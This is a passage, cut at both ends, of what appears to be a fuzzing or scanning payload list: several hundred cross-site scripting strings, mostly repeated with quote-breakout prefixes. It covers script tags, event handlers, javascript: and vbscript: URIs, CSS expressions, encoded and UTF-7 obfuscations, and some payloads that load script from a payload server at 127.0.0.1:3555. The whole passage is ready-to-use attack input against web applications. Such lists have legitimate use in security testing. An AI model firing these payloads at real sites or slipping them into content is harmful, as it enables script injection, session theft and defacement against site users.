url(http://127.0.0.1:3555/xss_serve_payloads/X.html));">', '\'><div style="binding: url(http://127.0.0.1:3555/xss_serve_payloads/X.html));">', '<div style="behaviour: url(\'http://127.0.0.1:3555/xss_serve_payloads/X.html\');">', '"><div style="behaviour: url(\'http://127.0.0.1:3555/xss_serve_payloads/X.html\');">', '\'><div style="behaviour: url(\'http://127.0.0.1:3555/xss_serve_payloads/X.html\');">', '<div style="binding: url("http://127.0.0.1:3555/xss_serve_payloads/X.html"));">', '"><div style="binding: url("http://127.0.0.1:3555/xss_serve_payloads/X.html"));">', '\'><div style="binding: url("http://127.0.0.1:3555/xss_serve_payloads/X.html"));">', '<SCRIPT <B>alert(1);</SCRIPT>', '"><SCRIPT <B>alert(1);</SCRIPT>', "'><SCRIPT <B>alert(1);</SCRIPT>", '<<SCRIPT>alert(1);/', '"><<SCRIPT>alert(1);/', "'><<SCRIPT>alert(1);//<</SCRIPT>", '"><<SCRIPT>alert(1);//<</SCRIPT>', "'><<SCRIPT>alert(1);//<</SCRIPT>", '<<script>alert(1);</script>', '"><<script>alert(1);</script>', "'><<script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>', '<INPUT TYPE="IMAGE" SRC="javascript:alert(1);">', '"><INPUT TYPE="IMAGE" SRC="javascript:alert(1);">', '\'><INPUT TYPE="IMAGE" SRC="javascript:alert(1);">', '<IMG SRC="javascript:alert(1)"', '"><IMG SRC="javascript:alert(1)"', '\'><IMG SRC="javascript:alert(1)"', '<iframe src=http://127.0.0.1:3555/xss_serve_payloads/X.html <', '"><iframe src=http://127.0.0.1:3555/xss_serve_payloads/X.html <', "'><iframe src=http://127.0.0.1:3555/xss_serve_payloads/X.html <", '<SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/alert(a.source)</SCRIPT>', '</ScrIpt><SCRIPT>a=/X/alert(a.source)</SCRIPT>', '"><SCRIPT>a=/X/alert(a.source)</SCRIPT>', '</ScrIpt><SCRIPT>a=/X/alert(a.source)</SCRIPT>', "'><SCRIPT>a=/X/alert(a.source)</SCRIPT>", '</ScrIpt><SCRIPT>a=/X/alert(a.source)</SCRIPT>', '\\";alert(1);//', '<input onfocus=javascript:alert(1) autofocus>', '"><input onfocus=javascript:alert(1) autofocus>', "'><input onfocus=javascript:alert(1) autofocus>", '<select onfocus=javascript:alert(1) autofocus>', '"><select onfocus=javascript:alert(1) autofocus>', "'><select onfocus=javascript:alert(1) autofocus>", '<textarea onfocus=javascript:alert(1) autofocus>', '"><textarea onfocus=javascript:alert(1) autofocus>', "'><textarea onfocus=javascript:alert(1) autofocus>", '<keygen onfocus=javascript:alert(1) autofocus>', '"><keygen onfocus=javascript:alert(1) autofocus>', "'><keygen onfocus=javascript:alert(1) autofocus>", '<input autofocus onfocus=alert(1)>', '"><input autofocus onfocus=alert(1)>', "'><input autofocus onfocus=alert(1)>", '<iframe/ /onload=alert(1)></iframe>', '"><iframe/ /onload=alert(1)></iframe>', "'><iframe/ /onload=alert(1)></iframe>", '<iframe/ "onload=alert(1)></iframe>', '"><iframe/ "onload=alert(1)></iframe>', '\'><iframe/ "onload=alert(1)></iframe>', '<iframe///////onload=alert(1)></iframe>', '"><iframe///////onload=alert(1)></iframe>', "'><iframe///////onload=alert(1)></iframe>", '<iframe "onload=alert(1)></iframe>', '"><iframe "onload=alert(1)></iframe>', '\'><iframe "onload=alert(1)></iframe>', '<iframe<?php echo chr(11)?> onload=alert(1)></iframe>', '"><iframe<?php echo chr(11)?> onload=alert(1)></iframe>', "'><iframe<?php echo chr(11)?> onload=alert(1)></iframe>", '<iframe<?php echo chr(12)?> onload=alert(1)></iframe>', '"><iframe<?php echo chr(12)?> onload=alert(1)></iframe>', "'><iframe<?php echo chr(12)?> onload=alert(1)></iframe>", '<ScRIPT x src=//0x.lv?</style></script><script>alert(String.fromCharCode(75,67,70))</script>', '"></script><script>alert(String.fromCharCode(75,67,70))</script>', "'></script><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script><script src=http://127.0.0.1:3555/xss_serve_payloads/X.js>', '<ScRIPT x src=//0x.lv?</style></script><script>alert(String.fromCharCode(75,67,70))</script>', '"></script><script>alert(String.fromCharCode(75,67,70))</script>', "'></script><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script><script src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp>', '</script><script>alert(X', '"></script><script>alert(X', "'></script><script>alert(X", '%7D%3C/style%3E43%27%22%3E%3C/title%3E%3Cscript%3Ea=eval;b=alert;a(b(/X/.source));%3C/script%3E%27%22%3E%3Cmarquee%3E%3Ch1%3EX%3C/h1%3E%3C/marquee%3E', '&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#75;&#67;&#70;&#34;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;', '<FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>', '"><FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>', '\'><FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>', "')alert(1);", '");alert(1);', '?;alert(?X?);?', '?;alert(String.fromCharCode(75,67,70));?', '?;alert(?X?);?', '?;alert(String.fromCharCode(75,67,70));?', '?;alert(?X?)', '?;alert(String.fromCharCode(75,67,70))', '?;alert(?X?)', '?;alert(String.fromCharCode(75,67,70))', '<script>var var = 1; alert(var)</script>', '</ScrIpt><script>var var = 1; alert(var)</script>', '"><script>var var = 1; alert(var)</script>', '</ScrIpt><script>var var = 1; alert(var)</script>', "'><script>var var = 1; alert(var)</script>", '</ScrIpt><script>var var = 1; alert(var)</script>', '<script type=text/javascript>alert(1)</script>', '"><script type=text/javascript>alert(1)</script>', "'><script type=text/javascript>alert(1)</script>", '?><script >alert(1)</script>', '<iframe src="http://127.0.0.1:3555/xss_serve_payloads/X.html" width="800" height="800">iframe</iframe>', '"><iframe src="http://127.0.0.1:3555/xss_serve_payloads/X.html" width="800" height="800">iframe</iframe>', '\'><iframe src="http://127.0.0.1:3555/xss_serve_payloads/X.html" width="800" height="800">iframe</iframe>', '<IMG SRC=`javascript:alert(?X says, ?X??)`>', '"><IMG SRC=`javascript:alert(?X says, ?X??)`>', "'><IMG SRC=`javascript:alert(?X says, ?X??)`>", '<img src = ?http://127.0.0.1:3555/xss_serve_payloads/X.js?>', '"><img src = ?http://127.0.0.1:3555/xss_serve_payloads/X.js?>', "'><img src = ?http://127.0.0.1:3555/xss_serve_payloads/X.js?>", '<img src = ?http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp?>', '"><img src = ?http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp?>', "'><img src = ?http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp?>", '<A HREF="//127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', '"><A HREF="//127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', '\'><A HREF="//127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', '<A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html./">X</A>', '"><A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html./">X</A>', '\'><A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html./">X</A>', '<A HREF="javascript:document.location=\'http://127.0.0.1:3555/xss_serve_payloads/X.html\'">X</A>', '"><A HREF="javascript:document.location=\'http://127.0.0.1:3555/xss_serve_payloads/X.html\'">X</A>', '\'><A HREF="javascript:document.location=\'http://127.0.0.1:3555/xss_serve_payloads/X.html\'">X</A>', '<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#75;&#67;&#70;&#39;&#41;&#59;>', '"><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#75;&#67;&#70;&#39;&#41;&#59;>', "'><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#75;&#67;&#70;&#39;&#41;&#59;>", '<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>', '"><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>', "'><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>", '<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>', '"><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>', "'><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>", '<DIV STYLE="background-image:\\0075\\0072\\006C\\0028\'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029\'\\0029">', '"><DIV STYLE="background-image:\\0075\\0072\\006C\\0028\'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029\'\\0029">', '\'><DIV STYLE="background-image:\\0075\\0072\\006C\\0028\'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029\'\\0029">', '?><s?%2b?cript>alert(1)</script>', '?><ScRiPt>alert(1)</script>', '?><<script>alert(1);//<</script>', 'foo%00<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<scr<script>ipt>alert(1)</scr</script>ipt>', '"><scr<script>ipt>alert(1)</scr</script>ipt>', "'><scr<script>ipt>alert(1)</scr</script>ipt>", '\';alert(String.fromCharCode(75,67,70))//\\\';alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//\\";alert(String.fromCharCode(75,67,70))//--&gt;&lt;/SCRIPT&gt;"&gt;\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(75,67,70))&lt;/SCRIPT&gt;', '\';alert(String.fromCharCode(75,67,70))//\\\';alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//\\";alert(String.fromCharCode(75,67,70))//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}', '\'\';!--"&lt;X&gt;=&amp;{()}', '&lt;IMG SRC="javascript:alert(1);"&gt;', '&lt;IMG SRC=javascript:alert(1)&gt;', '&lt;IMG SRC=JaVaScRiPt:alert(1)&gt;', '&lt;IMG SRC=javascript:alert(&amp;quot;X&amp;quot;)&gt;', '&lt;IMG SRC=`javascript:alert("Kerala Cyber Force says, \'X\'")`&gt;', '&lt;IMG """&gt;&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;"&gt;', '&lt;IMG SRC=javascript:alert(String.fromCharCode(75,67,70))&gt;', '&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;', '&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;', '&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;', '&lt;IMG SRC="jav&#x09;ascript:alert(1);"&gt;', '&lt;IMG SRC="jav&amp;#x09;ascript:alert(1);"&gt;', '&lt;IMG SRC="jav&amp;#x0A;ascript:alert(1);"&gt;', '&lt;IMG SRC="jav&amp;#x0D;ascript:alert(1);"&gt;', '<IMG SRC=`javascript:alert(1)`>', '"><IMG SRC=`javascript:alert(1)`>', "'><IMG SRC=`javascript:alert(1)`>", '&lt;IMG&#x0D;SRC&#x0D;=&#x0D;"&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;\'&#x0D;X&#x0D;S&#x0D;S&#x0D;\'&#x0D;)&#x0D;"&#x0D;>&#x0D;', '<IMG STYLE="X:expr/*X*/ession(alert(1))">', '"><IMG STYLE="X:expr/*X*/ession(alert(1))">', '\'><IMG STYLE="X:expr/*X*/ession(alert(1))">', '<IMG DYNSRC="javascript:alert(1)">', '"><IMG DYNSRC="javascript:alert(1)">', '\'><IMG DYNSRC="javascript:alert(1)">', '<img dynsrc="javascript:alert(1);">', '"><img dynsrc="javascript:alert(1);">', '\'><img dynsrc="javascript:alert(1);">', '<IMG LOWSRC="javascript:alert(1)">', '"><IMG LOWSRC="javascript:alert(1)">', '\'><IMG LOWSRC="javascript:alert(1)">', '<input type="image" dynsrc="javascript:alert(1);">', '"><input type="image" dynsrc="javascript:alert(1);">', '\'><input type="image" dynsrc="javascript:alert(1);">', '<STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>X', '"><STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>X', '\'><STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>X', '<DIV STYLE="width: expression(alert(1));">', '"><DIV STYLE="width: expression(alert(1));">', '\'><DIV STYLE="width: expression(alert(1));">', '<div style="width: expression(alert(1););">', '"><div style="width: expression(alert(1););">', '\'><div style="width: expression(alert(1););">', "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(1)';</STYLE>", '"><STYLE>@im\\port\'\\ja\\vasc\\ript:alert(1)\';</STYLE>', "'><STYLE>@im\\port'\\ja\\vasc\\ript:alert(1)';</STYLE>", '<X STYLE="X:expression(alert(1))">', '"><X STYLE="X:expression(alert(1))">', '\'><X STYLE="X:expression(alert(1))">', 'exp/*<A STYLE=\'no\\X:noX("*//*");X:&#101;x&#x2F;*X*//*/*/pression(alert(1))\'>', '<STYLE TYPE="text/javascript">alert(1);</STYLE>', '"><STYLE TYPE="text/javascript">alert(1);</STYLE>', '\'><STYLE TYPE="text/javascript">alert(1);</STYLE>', '<STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>', '"><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>', '\'><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>', '<A CLASS=X></A>', '"><A CLASS=X></A>', "'><A CLASS=X></A>", '<STYLE type="text/css">BODY{background:url("javascript:alert(1)")}</STYLE>', '"><STYLE type="text/css">BODY{background:url("javascript:alert(1)")}</STYLE>', '\'><STYLE type="text/css">BODY{background:url("javascript:alert(1)")}</STYLE>', '<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">', '"><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">', '\'><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">', "<? echo('<SCR)';echo('IPT>alert(1)</SCRIPT>'); ?>", '"><? echo(\'<SCR)\';echo(\'IPT>alert(1)</SCRIPT>\'); ?>', "'><? echo('<SCR)';echo('IPT>alert(1)</SCRIPT>'); ?>", '<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;">', '"><META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;">', '\'><META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;">', '<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-', '"><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-', '\'><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-', '<XML ID=0><I><B>&lt;IMG SRC="javas<!-- -->cript:alert(1)"&gt;</B></I></XML>', '"><XML ID=0><I><B>&lt;IMG SRC="javas<!-- -->cript:alert(1)"&gt;</B></I></XML>', '\'><XML ID=0><I><B>&lt;IMG SRC="javas<!-- -->cript:alert(1)"&gt;</B></I></XML>', '<SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '"><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '\'><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', 'a="get";b="URL(\\"";c="javascript:";d="alert(1);\\")";eval(a+b+c+d);', '<?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;alert(&quot;X&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>', '"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;alert(&quot;X&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>', '\'><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;alert(&quot;X&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>', '<xml src="javascript:alert(1);">', '"><xml src="javascript:alert(1);">', '\'><xml src="javascript:alert(1);">', '<xml id="X"><a><b><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>;</b></a></xml>', '<div datafld="b" dataformatas="html" datasrc="#X"></div>', '"><div datafld="b" dataformatas="html" datasrc="#X"></div>', '\'><div datafld="b" dataformatas="html" datasrc="#X"></div>', '<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>', '"><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>', '\'><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>', '%253cscript%253ealert(1)%253c/script%253e', 'foo\\?; alert(1);//?;', '[b][style="style=width:expre/**/ssion(alert(1))xt]bold[/style][/b]', '[b][style="onmouseover="alert(1);]bold[/style][/b]', '</script><script >alert(1)</script>', '"></script><script >alert(1)</script>', "'></script><script >alert(1)</script>", '?; alert(1); var foo=?', '<img src="" onerror=alert(1)>', '"><img src="" onerror=alert(1)>', '\'><img src="" onerror=alert(1)>', '<img src="" onerror=alert(1);>', '"><img src="" onerror=alert(1);>', '\'><img src="" onerror=alert(1);>', '><img src="x:x" onerror=alert(1)>', 's%22%20style=x:expression(alert(1))', 's%22%20style=%22background:url(javascript:alert(?X?))', 's%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27X%3F%29%29', '%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(1);>', '<IMG SRC=" \x0e javascript:alert(1);">', '"><IMG SRC=" \x0e javascript:alert(1);">', '\'><IMG SRC=" \x0e javascript:alert(1);">', '&lt;IMG SRC=" &amp;#14; javascript:alert(1);"&gt;', '&lt;SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"&gt;&lt;/SCRIPT&gt;', '&lt;SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"&gt;&lt;/SCRIPT&gt;', '&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\\]^`=alert(1)&gt;', '&lt;&lt;SCRIPT&gt;alert(1);//&lt;&lt;/SCRIPT&gt;', '&lt;IMG SRC="javascript:alert(1)"', '&lt;iframe src=http://127.0.0.1:3555/xss_serve_payloads/X.html &lt;', '&lt;SCRIPT&gt;a=/X/', 'alert(a.source)&lt;/SCRIPT&gt;', '&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(1);&lt;/SCRIPT&gt;', '&lt;INPUT TYPE="IMAGE" SRC="javascript:alert(1);"&gt;', '&lt;BODY BACKGROUND="javascript:alert(1)"&gt;', '&lt;BODY ONLOAD=alert(1)&gt;', '&lt;IMG LOWSRC="javascript:alert(1)"&gt;', '&lt;BGSOUND SRC="javascript:alert(1);"&gt;', '&lt;BR SIZE="&{alert(1)}"&gt;', '&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;X&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;X', "&lt;IMG SRC='vbscript:msgbox(1)'&gt;", '&lt;IMG SRC="mocha:[code]"&gt;', '&lt;IMG SRC="livescript:[code]"&gt;', '<img src=\'vbscript:do%63ument.lo%63ation="http://127.0.0.1:3555/xss_serve_payloads/X.html"\'>', '"><img src=\'vbscript:do%63ument.lo%63ation="http://127.0.0.1:3555/xss_serve_payloads/X.html"\'>', '\'><img src=\'vbscript:do%63ument.lo%63ation="http://127.0.0.1:3555/xss_serve_payloads/X.html"\'>', '&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);"&gt;', '&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="&gt;', '&lt;META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);"&gt;', '&lt;IFRAME SRC="javascript:alert(1);"&gt;&lt;/IFRAME&gt;', '&lt;FRAMESET&gt;&lt;FRAME SRC="javascript:alert(1);"&gt;&lt;/FRAMESET&gt;', '&lt;TABLE BACKGROUND="javascript:alert(1)"&gt;', '&lt;TABLE&gt;&lt;TD BACKGROUND="javascript:alert(1)"&gt;', '&lt;DIV STYLE="background-image: url(javascript:alert(1))"&gt;', '&lt;DIV STYLE="background-image:\\0075\\0072\\006C\\0028\'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029\'\\0029"&gt;', '&lt;DIV STYLE="background-image: url(&amp;#1;javascript:alert(1))"&gt;', '&lt;DIV STYLE="width: expression(alert(1));"&gt;', "&lt;STYLE&gt;@im\\port'\\ja\\vasc\\ript:alert(1)';&lt;/STYLE&gt;", '&lt;IMG STYLE="X:expr/*X*/ession(alert(1))"&gt;', '&lt;X STYLE="X:expression(alert(1))"&gt;', 'exp/*&lt;A STYLE=\'no\\X:noX("*//*");', '&lt;STYLE TYPE="text/javascript"&gt;alert(1);&lt;/STYLE&gt;', '&lt;STYLE&gt;.X{background-image:url("javascript:alert(1)");}&lt;/STYLE&gt;&lt;A CLASS=X&gt;&lt;/A&gt;', '&lt;STYLE type="text/css"&gt;BODY{background:url("javascript:alert(1)")}&lt;/STYLE&gt;', '&lt;SCRIPT&gt;alert(1);&lt;/SCRIPT&gt;', '&lt;BASE HREF="javascript:alert(1);//"&gt;', '&lt;OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/X.html"&gt;&lt;/OBJECT&gt;', '&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(1)&gt;&lt;/OBJECT&gt;', '&lt;EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;', 'a="get";&#10;b="URL(\\"";&#10;c="javascript:";&#10;d="alert(1);\\")";&#10;eval(a+b+c+d);', '&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&gt;&lt;![CDATA[cript:alert(1);"&gt;]]&gt;', '&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;', '&lt;XML ID=0&gt;&lt;I&gt;&lt;B&gt;&amp;lt;IMG SRC="javas&lt;!-- --&gt;cript:alert(1)"&amp;gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;', '&lt;SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"&gt;&lt;/SPAN&gt;', '&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;', '&lt;HTML&gt;&lt;BODY&gt;', '&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;', '&lt;?import namespace="t" implementation="#default#time2"&gt;', '&lt;t:set attributeName="innerHTML" to="X&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;X&amp;quot;)&amp;lt;/SCRIPT&amp;gt;"&gt;', '&lt;/BODY&gt;&lt;/HTML&gt;', "&lt;? echo('&lt;SCR)';", "echo('IPT&gt;alert(1)&lt;/SCRIPT&gt;'); ?&gt;", '&lt;META HTTP-EQUIV="Set-Cookie" Content="USERID=&amp;lt;SCRIPT&amp;gt;alert(1)&amp;lt;/SCRIPT&amp;gt;"&gt;', '&lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-', '&lt;A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"&gt;X&lt;/A&gt;', '&lt;A HREF="http://1113982867/"&gt;X&lt;/A&gt;', '&lt;A HREF="http://0x42.0x0000066.0x7.0x93/"&gt;X&lt;/A&gt;', '&lt;A HREF="http://0102.0146.0007.00000223/"&gt;X&lt;/A&gt;', '&lt;A HREF="h&#x0A;tt&#09;p://6&amp;#9;6.000146.0x7.147/"&gt;X&lt;/A&gt;', '&lt;A HREF="//127.0.0.1:3555/xss_serve_payloads/X.html"&gt;X&lt;/A&gt;', '&lt;A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html"&gt;X&lt;/A&gt;', '&lt;A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html./"&gt;X&lt;/A&gt;', '&lt;A HREF="javascript:document.location=\'http://127.0.0.1:3555/xss_serve_payloads/X.html\'"&gt;X&lt;/A&gt;', '&lt;A HREF="http://www.keralacyberhttp://www.keralacyberforce.in/force.in/"&gt;X&lt;/A&gt;', '<form id="test" /><button form="test" formaction="javascript:alert(1)">X', '"><form id="test" /><button form="test" formaction="javascript:alert(1)">X', '\'><form id="test" /><button form="test" formaction="javascript:alert(1)">X', '<input onblur=javascript:alert(1) autofocus><input autofocus>', '"><input onblur=javascript:alert(1) autofocus><input autofocus>', "'><input onblur=javascript:alert(1) autofocus><input autofocus>", '<video poster=javascript:alert(1)//<video poster=javascript:alert(1)//></video>', '"><video 